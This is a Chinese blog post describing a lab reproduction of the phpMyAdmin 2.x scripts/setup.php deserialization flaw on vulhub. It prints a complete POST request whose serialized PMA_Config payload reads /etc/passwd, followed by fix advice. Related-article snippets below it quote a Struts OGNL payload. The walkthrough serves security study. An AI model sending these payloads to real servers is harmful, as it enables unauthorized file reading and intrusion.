第三方应用漏洞之phpmyadmin scripts/setup.php 反序列化

最新推荐文章于 2022-04-14 17:31:41 发布
最新推荐文章于 2022-04-14 17:31:41 发布
阅读量653 收藏 1
点赞数
分类专栏: 网络安全 文章标签: php mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39756628/article/details/116144393
版权

漏洞简介

phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。虽然是很老的漏洞,但在内网大部分都是用着老版本,在外网存在的也为数不少。

影响版本:已知版本为 2.8.0.3、2.8.04

启动环境

cd /root/vulhub/phpmyadmin/WooYun-2016-199433
docker-compose up -d
在这里插入图片描述
环境启动后,直接在浏览器中访问http://192.168.0.107:8080,即可看到phpmyadmin的首页。因为没有连接数据库,所以此时会报错,但我们这个漏洞的利用与数据库无关,所以忽略。

在这里插入图片描述

漏洞复现

访问目录scripts/setup.php
在这里插入图片描述
刷新页面抓包
在这里插入图片描述
直接将上面数据包替换为下面代码:

POST /scripts/setup.php HTTP/1.1
Host: 192.168.0.107:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

在这里插入图片描述
可以看到成功读取/etc/passwd敏感文件
在这里插入图片描述

关闭环境

docker-compose down
在这里插入图片描述

修复建议

尽快升级到最新版 将setup.php中28行中的"configuration"改为传入其他值 直接删除scripts目录,防止被恶意攻击。

dddxsr
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpmyadmin scripts/setup.php 反序列化漏洞
千寻的博客
03-21 1713
序列化 (serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。【将状态信息保存为字符串简单的理解:将PHP中 对象、类、数组、变量、匿名函数等,转化为字符串,方便保存到数据库或者文件中,当在php中创建了一个对象后,可以通过把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。序列化就是将对象的状态信息转为字符串储存起来那么反序列化就是再将这个。
phpMyadmin各版本漏洞
aiquan9342的博客
10-04 1074
一: 影响版本:3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3 ANYUN.ORG   概述:PhpMyAdmin存在PREGREPLACEEVAL漏洞   利用模块:exploit/multi/http/phpmyadminpregreplace CVE: CVE-2013-3238 二: 影响版本:phpMyAdmin v3.5....
phpmyadmin/scripts/setup.php,phpMyAdmin setup.php文件跨站脚本执行漏洞
weixin_39573512的博客
03-20 204
BugCVE: CVE-2008-3456,CVE-2008-3457BUGTRAQ: 30420phpMyAdminscripts/setup.php文件中show_overview ($title, $list, $buttons = '')函数没有正确地过滤685行echo $val[1]输入参数便返回给了用户,如果用户受骗跟随了恶意链接的话就会导致在用户浏览器会话中执行任意HTML和脚本...
phpmyadmin/scripts/setup.php,Linux下phpMyAdmin安装过程中的问题解决
weixin_29085865的博客
03-20 218
1.下载phpMyAdmin,自己想办法拷到/var/www/html下,并解压,开始使用。http://IP/phpMyAdmin测试cp config.sample.inc.php config/config.inc.phpchmod o+w config/config.inc.php2.遇到问题一,phpMyAdmin无法载入MySql扩展,笔者解决方法为yum -y install php...
Phpmyadmin Scripts / setup.php反序列化漏洞 WooYun-2016-199433 漏洞复现
ADummy的博客
02-27 413
Phpmyadmin Scripts / setup.php反序列化漏洞(WooYun-2016-199433) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>有回显读取文件 0x01漏洞介绍 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码 影响版本 phpmyadmin 2.x 0x02漏洞复现 payload POST /scripts/setup.php HTTP/1.1 Host: your-ip:808
phpmyadmin/scripts/setup.php,关于phpmyadmin2.8及以后版本的安装
weixin_29584723的博客
03-20 254
关于phpmyadmin2.8及以后版本的安装2021-01-21 2:01:16840解压缩后放到网站根目录下跟以前的版本一样。但是新增一个scripts/setup把我给弄糊涂了下面是转载的一个台湾人的blog以下是引用片段:這幾天phpmyadmin出了新版2.8.0.1,版號算是又往前邁進了一步,於是找了個時間換了一下這個新版。如果整件事情只有這樣的話,那也沒什麼好講的啦!就是因為過程中有...
phpmyadmin安装时提示:Warning: require_once(./libraries/common.inc.php)错误解决办法
10-28
common.inc.php这个文件是存在的,而且系统中php也不装在C盘根目录下,怎么会有这样的提示呢?经过一阵调试终于发现解决方法
PhpMyAdmin出现export.php Missing parameter: what /export_type错误解决方法
12-19
PhpMyAdmin 不能导出数据的问题,点击导出后先是一个请求失败或者白页,重新刷新后就报错 export.php: Missing parameter: what (FAQ 2.8) export.php: Missing parameter: export_type (FAQ 2.8) 解决方法是: php...
phpmyadmin config.inc.php配置示例
01-21
php /* * Generated configuration file * Generated by: phpMyAdmin 4.0.4 setup script * Date: Mon, 26 Aug 2013 05:32:47 +0000 */ $cfg[‘blowfish_secret’] = ‘a8b7c6d’; $i = 0; $i++; $cfg[‘Servers’]...
Ruby on Rails 路径穿越与任意文件读取漏洞(CVE-2019-5418)
黑白的博客
12-14 334
声明 好好学习,天天向上 漏洞描述 在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。 通过传入Accept: …/…/…/…/…/…/…/…/etc/passwd{{ 头来构成构造路径穿越漏洞,读取任意文件。 影响范围 Rails全版本 其中修复版本 6.0.0.beta3, 5.2.2.1 5.1.6.2 5.0.7.2 4.2.11.1 复现过程 这里使用2.5.4版本 使用vulhub cd /app/vulhub-master/rai
php中%3cpre%3e有什么用,phpMyAdmin setup.php脚本PHP代码注入漏洞
weixin_34168834的博客
03-10 599
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit#!/bin/bash# CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11# by pagvac (gnucitizen.org), 4th June 2009.# spec...
phpmyadmin scripts/setup.php 反序列化漏洞复现实验
weixin_52347768的博客
02-25 4133
漏洞复现实验
Phpmyadmin 2.X 反序列化漏洞(WooYun-2016-199433)
jammny
11-28 1204
一、漏洞简介 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 二、漏洞影响 phpmyadmin 2.x 三、漏洞分析 https://rj45mp.github.io/phpMyAdmin-WooYun-2016-199433/ 四、漏洞利用 访问漏洞存在页面,并用bp进行抓包 更改请求为post并添加如下payload后发送,即可读取/etc/passwd: action=jammny&configurati.
phpMyAdmin漏洞安全防范
willow_liang的博客
11-28 1102
1.主要功能 数据库在线管理工具 操作数据. 执行mysq|命令 导出和导入数据库 网页版的mysq|管理工具 2.危害 MySQL数据库导出(数据库拖库) 执行导出Webshell 修改数据库 3.phpMyAdmin渗透利用思路 MySQL root密码暴力破解 源代码泄露 读取配置文件 root账号及权限三种方法获取Webshell SQLMAP直连数据库获取权限 社工方法来获取权限 4.phpMyAdmin防范思路 重命名文件夹. 禁止列目录漏洞 设置数据库高强度密
反序列化漏洞——http://159.75.16.25:8066 phpmyadmin scripts/setup.php 反序列化漏洞 http://159.75.16.25
m0_52341820的博客
04-14 369
php反序列化漏洞漏洞原理,如何防御此漏洞?如何利用此漏洞? 原理: 未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL注入,目录遍历等不可控后果 防御: 进行签名与认证,避免应用接受黑客的异常输入 限制序列化与反序列化的类,避免接受任何处理类型 RASP检测,判断应用是否执行了非应用本身的逻辑 利用: 通过该漏洞,可以在内容中嵌入执行自定义命令的代码,获取服务器的权限 可以构造其他,导致耗尽服务器的CPU,停止服务 可以获得途径 2、http:
phpmyadmin scripts/setup.php 反序列化漏洞复现
weixin_56513549的博客
02-23 2023
首先在password地方输入%{1+1} 发现解析成了2,说明存在该漏洞 输入 %{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"} 获取Tomcat执行路径 获取web路径 %{ #req=@org.apache.struts2.ServletActionContext@getRequest(), #response=#context.get("com.opensymphony.xwork2.dispatch..
phpMyAdmin setup.php脚本的任意PHP代码注入漏洞
weixin_34343308的博客
03-21 2665
phpMyAdmin (/scripts/setup.php) PHP 注入代码 此漏洞代码在以下环境测试通过:phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 及 3.0.1.1版本;Linux内核版本 2.6.24-24-generic i686 GNU/Linux (Ubuntu ...
phpMyadmin /scripts/setup.php Execute Arbitrary PHP Code Via A Crafted POST Request CVE-2010-3055
weixin_30820151的博客
01-20 184
目录 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 The configuration setup script (aka scripts/setup.php) in phpMyAdmin 2.11.x before 2.11.10.1 does not properly restrict ...
phpmyadmin scripts/setup.php 反序列化漏洞攻击实验
每天累计一滴水 十天后变成一大滴水 一百天后变成一杯水
10-07 921
msf攻击phpmyadmin 4.0x - 4.6.2 远程代码执行漏洞Phpmyadmin Scripts/setup.php Deserialization Vulnerability (WooYun-2016-199433) deserialization n 反序列化,还原序列化 目标(被攻击)计算机搭建漏洞环境: 攻击计算机启用漏洞攻击模块: 目标(被攻击)计算机退出漏洞环境: 攻击计算机退出漏洞攻击环境: ...
我的后台服务为什么会有 /phpMyAdmin-2.10.3/scripts/setup.php的访问记录
最新发布
06-09
这可能是因为您的服务器安装了 phpMyAdmin,而 /phpMyAdmin-2.10.3/scripts/setup.phpphpMyAdmin 的一部分。setup.php 是用于安装和配置 phpMyAdmin 的脚本,因此如果有关于它的访问记录,可能是有人试图在您的服务器上安装或配置 phpMyAdmin。建议您检查服务器的安全性,并确保只有授权的用户可以访问和修改 phpMyAdmin

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值